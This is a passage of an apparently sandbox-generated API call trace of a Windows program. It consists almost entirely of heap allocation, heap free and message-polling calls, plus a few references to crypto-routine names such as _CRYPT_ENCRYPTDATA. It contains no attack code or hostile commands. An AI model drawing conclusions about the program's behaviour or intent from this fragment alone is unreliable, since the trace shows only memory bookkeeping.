hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0200.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c18 [0200.475] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14227) returned 0x2f24018 [0200.477] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0xe52020 | out: hHeap=0x970000) returned 1 [0200.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0200.480] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0200.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0200.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bf8 | out: hHeap=0x970000) returned 1 [0200.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0200.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0200.481] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504b8 | out: hHeap=0x970000) returned 1 [0200.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0200.481] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14227) returned 0x2f38248 [0200.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0200.483] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c18 | out: hHeap=0x970000) returned 1 [0200.483] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.483] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cd8 [0200.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0200.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0200.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0200.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0200.484] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14227) returned 0x2f24018 [0200.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0200.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24018 | out: hHeap=0x970000) returned 1 [0200.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0200.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50458 | out: hHeap=0x970000) returned 1 [0200.486] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e504a0 | out: hHeap=0x970000) returned 1 [0200.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54cd8 | out: hHeap=0x970000) returned 1 [0200.487] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0200.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0200.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0200.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0200.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0200.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0200.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0200.487] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0200.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bf8 [0200.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0200.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0200.487] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0200.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0200.487] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bd8 | out: hHeap=0x970000) returned 1 [0200.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505a8 [0200.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54cd8 [0200.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0200.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0200.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0200.487] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bc8 [0200.488] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14227) returned 0x2f24018 [0200.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0200.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c18 [0200.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50680 [0200.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b68 [0200.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b68 | out: hHeap=0x970000) returned 1 [0200.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54b68 [0200.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50458 [0200.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0200.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0200.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54d08 [0200.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504a0 [0200.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0200.490] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ce8 | out: hHeap=0x970000) returned 1 [0200.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0200.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54328 [0200.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0200.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bd8 [0200.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0200.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ce8 [0200.490] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14227) returned 0x2e80330 [0200.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54120 [0200.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0200.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cf8 [0200.494] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0200.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0200.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0200.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543c8 [0200.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0200.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0200.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0200.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54238 [0200.494] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0200.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0200.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0200.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0200.495] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0200.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0200.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0200.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0200.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0200.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e544e0 [0200.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0200.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0200.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0200.495] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0200.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0200.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0200.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0200.496] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0200.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0200.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0200.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0200.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0200.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54530 [0200.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0200.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0200.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0200.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0200.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0200.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0200.496] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0200.496] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0200.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0200.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0200.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0200.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0200.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540a8 [0200.496] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0200.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0200.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0200.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0200.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0200.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0200.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0200.497] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0200.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0200.497] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0200.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0200.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0200.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0200.497] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0200.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0200.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0200.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0200.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0200.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54440 [0200.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0200.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0200.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0200.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0200.498] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0200.498] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0200.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0200.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0200.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0200.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0200.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0200.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0200.498] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0200.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0200.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0200.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0200.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0200.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0200.499] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54490 [0200.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0200.499] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0200.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54490 | out: hHeap=0x970000) returned 1 [0200.499] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0200.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0200.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0200.499] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0200.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0200.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fed8 [0200.499] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0200.500] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0200.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fed8 | out: hHeap=0x970000) returned 1 [0200.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0200.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0200.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0200.500] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0200.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0200.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0200.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0200.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0200.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0200.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0200.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0200.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0200.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0200.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0200.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0200.500] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0200.500] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0200.500] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0200.500] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0200.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fce0 [0200.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0200.501] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0200.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fce0 | out: hHeap=0x970000) returned 1 [0200.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0200.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0200.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0200.501] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0200.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0200.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0200.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0200.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0200.501] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0200.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0200.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0200.501] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0200.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0200.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0200.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0200.501] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0200.501] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.501] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a08 [0200.502] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0200.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0200.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0200.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0200.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0200.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0200.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0200.502] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0200.502] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0200.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0200.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0200.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0200.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0200.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0200.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0200.502] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0200.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0200.502] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0200.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507a0 [0200.502] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0200.503] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0200.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0200.503] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0200.503] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0200.503] HeapFree (in: 